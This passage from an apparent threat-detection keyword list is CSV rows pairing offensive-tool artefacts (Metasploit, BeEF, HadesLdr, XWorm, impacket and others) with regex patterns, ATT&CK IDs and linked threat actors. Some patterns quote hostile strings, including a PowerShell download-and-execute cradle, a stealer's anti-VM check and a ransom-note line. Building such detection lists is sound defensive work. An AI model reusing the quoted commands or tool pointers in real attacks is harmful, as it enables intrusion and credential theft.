tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","48186" "*IDiagnosticProfileUAC.git*",".{0,1000}IDiagnosticProfileUAC\.git.{0,1000}","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege 
Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","N/A","10","2","182","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z","48188" "*IDiagnosticProfileUAC-main*",".{0,1000}IDiagnosticProfileUAC\-main.{0,1000}","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","N/A","10","2","182","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z","48189" "*Idov31/Jormungandr*",".{0,1000}Idov31\/Jormungandr.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","N/A","3","228","27","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z","48190" "*Idov31/Nidhogg*",".{0,1000}Idov31\/Nidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation 
tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","48191" "*Idov31/Sandman*",".{0,1000}Idov31\/Sandman.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","1","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","48192" "*idrac_default_pass.txt*",".{0,1000}idrac_default_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48193" "*idrac_default_user.txt*",".{0,1000}idrac_default_user\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48194" "*IDSyscall.exe*",".{0,1000}IDSyscall\.exe.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","48195" "*IDSyscall.sln*",".{0,1000}IDSyscall\.sln.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","48196" "*IDSyscall.vcxproj*",".{0,1000}IDSyscall\.vcxproj.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","48197" "*IDSyscall/IDSyscall*",".{0,1000}IDSyscall\/IDSyscall.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","48198" "*IDSyscall\IDSyscall*",".{0,1000}IDSyscall\\IDSyscall.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","48199" "*IE/Edge Grabber Begin*",".{0,1000}IE\/Edge\sGrabber\sBegin.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#content","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","48200" "*ie_execcommand_uaf.rb*",".{0,1000}ie_execcommand_uaf\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48201" "*ie_win_fakenotification-clippy*",".{0,1000}ie_win_fakenotification\-clippy.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","48202" "*ie_win_htapowershell.*",".{0,1000}ie_win_htapowershell\..{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","48203" "*ie_win_missingflash-prettytheft*",".{0,1000}ie_win_missingflash\-prettytheft.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","48204" "*iepv.exe /stext *",".{0,1000}iepv\.exe\s\/stext\s.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","48205" "*IERMTCBpbnRvIHByb2Nlc3MgOiA=*",".{0,1000}IERMTCBpbnRvIHByb2Nlc3MgOiA\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","48206" "*iex(new-object net.webclient).downloadstring(*/pwv.ps1*",".{0,1000}iex\(new\-object\snet\.webclient\)\.downloadstring\(.{0,1000}\/pwv\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","48208" "*If no process provided, it will attempt to inject into explorer.exe*",".{0,1000}If\sno\sprocess\sprovided,\sit\swill\sattempt\sto\sinject\sinto\sexplorer\.exe.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation 
tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","48212" "*if os.getlogin() in [""WDAGUtilityAccount"",""Abby"",""Peter Wilson"",""hmarc"",""patex"",""JOHN-PC"",""RDhJ0CNFevzX"",""kEecfMwgj"",""Frank"",""8Nl0ColNQ5bq""*",".{0,1000}if\sos\.getlogin\(\)\sin\s\[\""WDAGUtilityAccount\"",\""Abby\"",\""Peter\sWilson\"",\""hmarc\"",\""patex\"",\""JOHN\-PC\"",\""RDhJ0CNFevzX\"",\""kEecfMwgj\"",\""Frank\"",\""8Nl0ColNQ5bq\"".{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","48213" "*If the attack is successful* you will see authentication logs of machines retrieving and executing the malicious GPO*",".{0,1000}If\sthe\sattack\sis\ssuccessful.{0,1000}\syou\swill\ssee\sauthentication\slogs\sof\smachines\sretrieving\sand\sexecuting\sthe\smalicious\sGPO.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","48214" "*If x.ProcessName = ""ProcessHacker"" *",".{0,1000}If\sx\.ProcessName\s\=\s\""ProcessHacker\""\s.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - 
T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","48215" "*If XWorm Does Not work - Run This Script As Administrator!*",".{0,1000}If\sXWorm\sDoes\sNot\swork\s\-\sRun\sThis\sScript\sAs\sAdministrator!.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#content","N/A","10","","N/A","","","","48216" "*If you do not pay the ransom, we will attack your company again in the future*",".{0,1000}If\syou\sdo\snot\spay\sthe\sransom,\swe\swill\sattack\syour\scompany\sagain\sin\sthe\sfuture.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48217" "*if you do not use masscan you can't give me CIDR as input*",".{0,1000}if\syou\sdo\snot\suse\smasscan\syou\scan\'t\sgive\sme\sCIDR\sas\sinput.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - 
TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","48218" "*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*",".{0,1000}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\=.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","#base64","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","48224" "*Ignitetechnologies/Persistence-Accessibility-Features*",".{0,1000}Ignitetechnologies\/Persistence\-Accessibility\-Features.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","1","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","48225" "*ihamburglar/fgdump*",".{0,1000}ihamburglar\/fgdump.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","1","N/A","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","48226" "*IIS-Backdoor.*",".{0,1000}IIS\-Backdoor\..{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","48227" "*IIS-Raid-master*",".{0,1000}IIS\-Raid\-master.{0,1000}","offensive_tool_keyword","IIS-Raid","A native 
backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","48228" "*iisreset.exe /stop*",".{0,1000}iisreset\.exe\s\/stop.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","N/A","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","FIN7","10","10","N/A","N/A","N/A","N/A","48229" "*ijacbjjjpmhencpkoghphdgbooifplmn*",".{0,1000}ijacbjjjpmhencpkoghphdgbooifplmn.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","#browser_extensionid","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","48230" "*IKEEXT DLL Hijacking*",".{0,1000}IKEEXT\sDLL\sHijacking.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","0","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","48231" "*Ikeext-Privesc.ps1*",".{0,1000}Ikeext\-Privesc\.ps1.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/securycore/Ikeext-Privesc","1","1","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","48232" "*ikeforce.py*",".{0,1000}ikeforce\.py.{0,1000}","offensive_tool_keyword","IKEForce","IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.","T1110 - T1201 - T1018","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/SpiderLabs/ikeforce","1","1","#linux","N/A","N/A","3","241","73","2019-09-18T09:35:41Z","2014-09-12T01:11:00Z","48233" "*ikescan2john.py*",".{0,1000}ikescan2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","48234" "*ILBypass.ps1*",".{0,1000}ILBypass\.ps1.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","48235" "*Imanfeng/Telemetry*",".{0,1000}Imanfeng\/Telemetry.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","1","N/A","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","48236" "*imaohw/nib/rsu/*",".{0,1000}imaohw\/nib\/rsu\/.{0,1000}","offensive_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. 
or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","Black Basta","Collection","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A","48237" "*imapattack.py*",".{0,1000}imapattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","48238" 
"*imapattack.py*",".{0,1000}imapattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48239" "*imaprelayclient.py*",".{0,1000}imaprelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - 
APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","48240" "*imaprelayclient.py*",".{0,1000}imaprelayclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
